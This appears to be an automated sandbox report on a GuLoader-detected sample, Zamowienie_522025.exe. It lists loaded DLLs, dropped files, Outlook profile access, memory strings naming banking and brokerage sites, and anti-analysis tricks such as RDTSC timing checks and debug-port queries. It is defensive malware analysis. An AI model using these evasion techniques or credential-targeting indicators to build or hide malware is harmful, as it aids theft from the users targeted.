Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Aktion.ini

Jump to behavior

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Zamowienie_522025.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: rmactivate_ssp.pdb source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000321C1000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517426237.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517055674.0000000001340000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Zamowienie_522025.exe, 00000009.00000002.2087643297.000000003257E000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2087643297.00000000323E0000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1969302724.0000000032232000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1966643050.000000003208B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2063030089.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2066458610.0000000003856000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003A00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Zamowienie_522025.exe, Zamowienie_522025.exe, 00000009.00000002.2087643297.000000003257E000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2087643297.00000000323E0000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1969302724.0000000032232000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1966643050.000000003208B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 0000000F.00000003.2063030089.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2066458610.0000000003856000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003A00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1982771460.000000000054F000.00000002.00000001.01000000.00000009.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000002.2515601948.000000000054F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: rmactivate_ssp.pdbGCTL source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000321C1000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517426237.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517055674.0000000001340000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000005.00000002.1406033202.00000000042D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_6EDE1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

5_2_6EDE1B63

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_6EDE2FD0 push eax; ret	5_2_6EDE2FFE
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A0225F pushad ; ret	15_2_03A027F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A027FA pushad ; ret	15_2_03A027F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A309AD push ecx; mov dword ptr [esp], ecx	15_2_03A309B6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A0283D push eax; iretd	15_2_03A02858
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A01366 push eax; iretd	15_2_03A01369
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD2040 push ss; iretd	15_2_02FD20B7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FCC1E1 push esp; ret	15_2_02FCC1E2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC4132 push ebx; iretd	15_2_02FC4161
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC07A5 push cs; retf	15_2_02FC07AD
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FDA720 push ds; iretd	15_2_02FDA7FD
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBE491 push ebx; iretd	15_2_02FBE492
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC4520 push ebx; retf	15_2_02FC4564
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC451C push ebx; retf	15_2_02FC4564
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FB2DA4 push esi; retf	15_2_02FB2DAE
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FB92F9 push ebx; retf	15_2_02FB92FA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBD3B0 push C8493F28h; retf E8BDh	15_2_02FBD543
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FB513E push esi; iretd	15_2_02FB5149
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC5896 push 00000040h; ret	15_2_02FC58C3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC3FD4 push es; retf	15_2_02FC3FD6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD1D10 push eax; ret	15_2_02FD1D1D
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FF6E3 push eax; ret	15_2_037FF6E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FB4B8 pushad ; retf	15_2_037FB4BC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037F5B52 push esi; iretd	15_2_037F5B56
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037F184F push esi; ret	15_2_037F1852

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File created: C:\Users\user\AppData\Local\Temp\nsw158B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	API/Special instruction interceptor: Address: 480B3AC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	API/Special instruction interceptor: Address: 1C6B3AC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	RDTSC instruction interceptor: First address: 47E1C5E second address: 47E1C5E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0754B3C5B8h 0x00000006 inc ebp 0x00000007 cmp ah, dh 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	RDTSC instruction interceptor: First address: 1C41C5E second address: 1C41C5E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0754B512C8h 0x00000006 inc ebp 0x00000007 cmp ah, dh 0x00000009 inc ebx 0x0000000a rdtsc

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 9_2_3248D1C0 rdtsc

9_2_3248D1C0

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw158B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_004059CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_004065FD FindFirstFileW,FindClose,	5_2_004065FD
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_00402868 FindFirstFileW,	5_2_00402868
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FCC510 FindFirstFileW,FindNextFileW,FindClose,	15_2_02FCC510

Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 6495-78B.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 6495-78B.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.0000000003263000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE$a
Source: 6495-78B.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,113?
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231u
Source: 6495-78B.15.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Zamowienie_522025.exe, 00000009.00000003.1966977677.0000000002131000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2064924123.00000000020EC000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2064985816.0000000002131000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967330215.00000000020EB000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1785564974.0000000002131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,116x0
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 6495-78B.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lobal passwords blocklistVMware2
Source: 6495-78B.15.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696
Source: 6495-78B.15.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 6495-78B.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ivebrokers.comVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 6495-78B.15.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 6495-78B.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 6495-78B.15.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EU WestVMware20,11696492231n
Source: firefox.exe, 00000012.00000002.2369201460.0000026A1805E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA-
Source: 6495-78B.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231}
Source: 6495-78B.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000002.2517695484.00000000010F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 6495-78B.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 6495-78B.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 6495-78B.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 6495-78B.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	API call chain: ExitProcess graph end node			graph_5-4412
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	API call chain: ExitProcess graph end node			graph_5-4419

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 9_2_3248D1C0 rdtsc

9_2_3248D1C0

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 9_2_324535C0 NtCreateMutant,LdrInitializeThunk,

9_2_324535C0

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_6EDE1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

5_2_6EDE1B63

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409240 mov eax, dword ptr fs:[00000030h]	9_2_32409240
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409240 mov eax, dword ptr fs:[00000030h]	9_2_32409240
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244724D mov eax, dword ptr fs:[00000030h]	9_2_3244724D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249D250 mov ecx, dword ptr fs:[00000030h]	9_2_3249D250
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CB256 mov eax, dword ptr fs:[00000030h]	9_2_324CB256
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CB256 mov eax, dword ptr fs:[00000030h]	9_2_324CB256
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DD26B mov eax, dword ptr fs:[00000030h]	9_2_324DD26B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DD26B mov eax, dword ptr fs:[00000030h]	9_2_324DD26B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32451270 mov eax, dword ptr fs:[00000030h]	9_2_32451270
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32451270 mov eax, dword ptr fs:[00000030h]	9_2_32451270
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32439274 mov eax, dword ptr fs:[00000030h]	9_2_32439274
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32447208 mov eax, dword ptr fs:[00000030h]	9_2_32447208
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32447208 mov eax, dword ptr fs:[00000030h]	9_2_32447208
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5227 mov eax, dword ptr fs:[00000030h]	9_2_324E5227
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0 mov eax, dword ptr fs:[00000030h]	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324192C5 mov eax, dword ptr fs:[00000030h]	9_2_324192C5
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324192C5 mov eax, dword ptr fs:[00000030h]	9_2_324192C5
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B2D3 mov eax, dword ptr fs:[00000030h]	9_2_3240B2D3
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B2D3 mov eax, dword ptr fs:[00000030h]	9_2_3240B2D3
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B2D3 mov eax, dword ptr fs:[00000030h]	9_2_3240B2D3
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F2D0 mov eax, dword ptr fs:[00000030h]	9_2_3243F2D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F2D0 mov eax, dword ptr fs:[00000030h]	9_2_3243F2D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED mov eax, dword ptr fs:[00000030h]	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E52E2 mov eax, dword ptr fs:[00000030h]	9_2_324E52E2
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF2F8 mov eax, dword ptr fs:[00000030h]	9_2_324CF2F8
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB2F0 mov eax, dword ptr fs:[00000030h]	9_2_324BB2F0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BB2F0 mov eax, dword ptr fs:[00000030h]	9_2_324BB2F0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324092FF mov eax, dword ptr fs:[00000030h]	9_2_324092FF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5283 mov eax, dword ptr fs:[00000030h]	9_2_324E5283
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244329E mov eax, dword ptr fs:[00000030h]	9_2_3244329E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244329E mov eax, dword ptr fs:[00000030h]	9_2_3244329E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324252A0 mov eax, dword ptr fs:[00000030h]	9_2_324252A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324252A0 mov eax, dword ptr fs:[00000030h]	9_2_324252A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324252A0 mov eax, dword ptr fs:[00000030h]	9_2_324252A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324252A0 mov eax, dword ptr fs:[00000030h]	9_2_324252A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A72A0 mov eax, dword ptr fs:[00000030h]	9_2_324A72A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A72A0 mov eax, dword ptr fs:[00000030h]	9_2_324A72A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D92A6 mov eax, dword ptr fs:[00000030h]	9_2_324D92A6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D92A6 mov eax, dword ptr fs:[00000030h]	9_2_324D92A6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D92A6 mov eax, dword ptr fs:[00000030h]	9_2_324D92A6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D92A6 mov eax, dword ptr fs:[00000030h]	9_2_324D92A6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324992BC mov eax, dword ptr fs:[00000030h]	9_2_324992BC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324992BC mov eax, dword ptr fs:[00000030h]	9_2_324992BC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324992BC mov ecx, dword ptr fs:[00000030h]	9_2_324992BC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324992BC mov ecx, dword ptr fs:[00000030h]	9_2_324992BC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D34C mov eax, dword ptr fs:[00000030h]	9_2_3240D34C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D34C mov eax, dword ptr fs:[00000030h]	9_2_3240D34C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5341 mov eax, dword ptr fs:[00000030h]	9_2_324E5341
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409353 mov eax, dword ptr fs:[00000030h]	9_2_32409353
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409353 mov eax, dword ptr fs:[00000030h]	9_2_32409353
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF367 mov eax, dword ptr fs:[00000030h]	9_2_324CF367
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32417370 mov eax, dword ptr fs:[00000030h]	9_2_32417370
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32417370 mov eax, dword ptr fs:[00000030h]	9_2_32417370
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32417370 mov eax, dword ptr fs:[00000030h]	9_2_32417370
